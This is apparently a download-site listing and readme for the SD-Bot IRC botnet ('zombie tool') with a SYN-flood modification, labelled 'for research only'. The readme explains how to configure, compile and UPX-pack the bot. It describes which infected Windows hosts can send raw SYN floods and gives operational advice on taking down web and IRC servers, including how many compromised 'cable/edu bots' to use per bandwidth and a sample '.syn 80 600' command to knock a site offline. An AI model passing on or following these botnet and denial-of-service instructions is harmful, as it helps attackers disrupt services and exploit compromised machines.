syn bot zombie 

上传日期:2006-04-30 09:52:08
上 传 者ro2002cky
说明:  著名的SD-Bot僵尸工具,只供研究,不要恶意使用。
(famous SD- bot zombie tools, the use of research, not malicious use.)

commandref.html (33954, 2002-12-22)
make-lcc.bat (522, 2002-12-22)
sdbot05b.c (77767, 2003-07-17)
sdbot.jpg (11152, 2002-12-22)

sdbot 0.5b (test release) by [sd] with SYN mod by Tesla =================================== web site: irc:, #sdbot notes on this special edition ------------------------------- Functionally, there are only three differences between this "sdbot SYN edition" and the last (0.5b) release; the .syn command, a tiny fix to the .systeminfo command (the MHz calculation under LCC), and the "currently logged on user" part in the .systeminfo command. I didn't want to add a bunch of mods at once because not everyone wants hostmasking, socks4, etc. If you want to add a mod yourself, check out Red Fusion Mods: ..everyone is encouraged to "trick out" their sdbot. Q: Why release a whole package and not just the code snippets like on Red Fusion? A: Because sdbot was using the old winsock libs and the SYN flood requires raw WSASockets, which Ws2_32.lib has. The make-lcc.bat is updated. If you want to build this special edition with MSVC or MING, you'll need to tell it to use Ws2_32.lib - I haven't included project or make files because I only use/have LCC. Q: Most of my bots just stop right away and say "Done with SYN flood [0KB/sec]" .. what's up? A: Win95 and *** will not allow the level of packet manipulation required by the SYN flood. They will always return 0 right away. Win2k and NT will only do it if an administrator is logged on, which is why I've added the username to the .systeminfo command. XP should always work fine. My advice is to .remove bots that use 9x on general principals. Q: What are the best parameters for taking down a webserver/IRCd/whatever? A: The whole idea behind a SYN flood is to force the remote host to stop accecpting new connections on the desired port. Each OS has a different limit and timeout but in general, 5 to 16 SYN_WAIT state sockets will lock up a given port for 75-180 seconds. Newer or freshly patches systems will require [much] more. My suggestion is to keep the syn running for as long as you want to shutdown the port and use 3 cable/edu bots for every 100KB/sec the host is capable of multiplied by the number of servers in their farm (if more than 1). Example: You want to make the website for "unavailable" for 10 minutes. They are running a single linux box at their hosting company with an older kernel on a 1Mbit line. You .dns and find it's IP is You'll need to issue this command to [at least] 2 of your [reliable] cable bots: .syn 80 600 Q: How much size does all this extra stuff add? A: None! I think it's smaller, even. 33824 bytes unpacked and 13856 packed with UPX. I "fixed" the batch file to optimize the output better. That's 13KB. You're welcome. how to edit the source file ----------------------------- extract the files from the zip into a folder, and look for a file called 'sdbot05b.c' (LCC/mingw) or 'sdbot05b.cpp' (MSVC++). these are source files for sdbot. the contents of both files are exactly the same, they are seperate files mainly for the sake of convenience. near the beginning of the source file, you'll see a section with the title '// bot configuration' at the top of it. simply edit the strings in this section to whatever you want. if you're not compiling with LCC, mingw or MS Visual C++, you may have to insert numbers into the brackets that correspond to the string length. make sure that the number in brackets is at least the length of the string plus 1. for example, i might change: const char botid[] = "sdbot2"; // bot id to: const char botid[9] = "sdbot123"; // bot id ^-changed to 9 (length of string plus 1) the section directly above that one has a few sample aliases in it, modify those however you want, making sure that there's a '\' at the end of all the aliases except the last one, and that maxaliases is set to a number greater than the number of aliases. there are a bunch of #define lines with '//' in front of them. removing the '//' from the beginning of one will cause a particular function to be disabled. for example, NO_SYSINFO controls whether or not the system info command is included in the compiled exe. how to compile with lcc ------------------------- first of all, you'll need LCC (which you can get from installed on your system. edit the make-lcc.bat file, changing 'c:\lcc' to point to the location of your lcc folder, then run it. an exe file should appear in the folder that you extracted the sdbot files into. how to pack the exe --------------------- if you want to pack the exe (to make it smaller) i would recommend that you use UPX, which is available at just put upx in the folder with your sdbot exe, then run: upx --best sdbot05b.exe there are provisions for this in the .bat file; just put UPX in your LCC/bin directory and un-REM the appropriate line. changes since 0.5a -------------------- now compiles with mingw (which also means that you can now compile it with dev-c++) dynamic loading of a few more functions, should be more compatible with older systems now fixed 3 letter nick bug in spy fixed c_privmsg and c_action fixed clone acting like spy bug fixed random nick generator (now includes the letter 'z') fixed login/logout issues with private messages fixed sending udp/ping to IPs that don't resolve fixed VERSION request to channel bug fixed a few other minor issues system info now displays service packs (if installed) bot no longer messages the channel when a logged in user quits improved dns (can now resolve both IPs and hostnames) spy now relays mode changes addded visit command (for simulating site visits) added the ability to use variables in normal commands added delay command added notice (-n) parameter you can now specify a backup channel for the backup server bot now responds to notices with notices instead of privmsgs should now run on NT (as long as IE 4 or higher is installed) improved stability (hopefully) various other improvements


